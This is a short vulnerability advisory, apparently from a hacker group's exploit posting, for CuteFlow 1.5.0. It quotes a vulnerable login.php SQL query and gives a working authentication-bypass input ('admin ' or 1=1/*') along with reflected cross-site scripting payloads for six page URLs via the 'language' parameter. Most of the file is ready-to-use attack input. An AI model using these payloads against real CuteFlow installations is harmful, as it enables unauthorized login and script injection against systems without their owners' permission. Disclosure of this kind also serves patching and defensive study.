cuteflow-sqlxss.txt

` ########################################################################  
# #  
# CuteFlow Version 1.5.0 Multiple Remote Vulnerabilities #  
# [sql injection & Xss] #  
########################################################################  
  
Virangar Security Team  
  
www.virangar.org  
www.virangar.net  
  
--------  
Discoverd By : hadihadi   
  
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra  
  
& all virangar members & all iranian hackerz  
  
greetz:to my best friend in the world hadi_aryaie2004  
& my lovely friend arash(imm02tal) from emperor team :)  
  
sql vuln code in login.php:  
  
$query = "select * from cf_user where strPassword = '$strMd5Password' AND strUserId = '".$_REQUEST["UserId"]."'";  
  
-----------------------  
the login forme included in index.php you must login in index.php ;)  
vuln:  
login:admin ' or 1=1/*  
password:whatever  
-------------------------------------  
and you can see xss vuln too here:  
  
/page/showcirculation.php?language=<script>alert(1111)</script>  
/pages/edittemplate_step2.php?language=<script>alert(1111)</script>  
/pages/showfields.php?language=<script>alert(1111)</script>>  
/pages/showuser.php?language=<script>alert(1111)</script>  
/pages/editmailinglist_step1.php?language=<script>alert(222)</script>  
/pages/showtemplates.php?language=<script>alert(1111)</script>  
-------------------------  
tnx all h4ck3rz  
`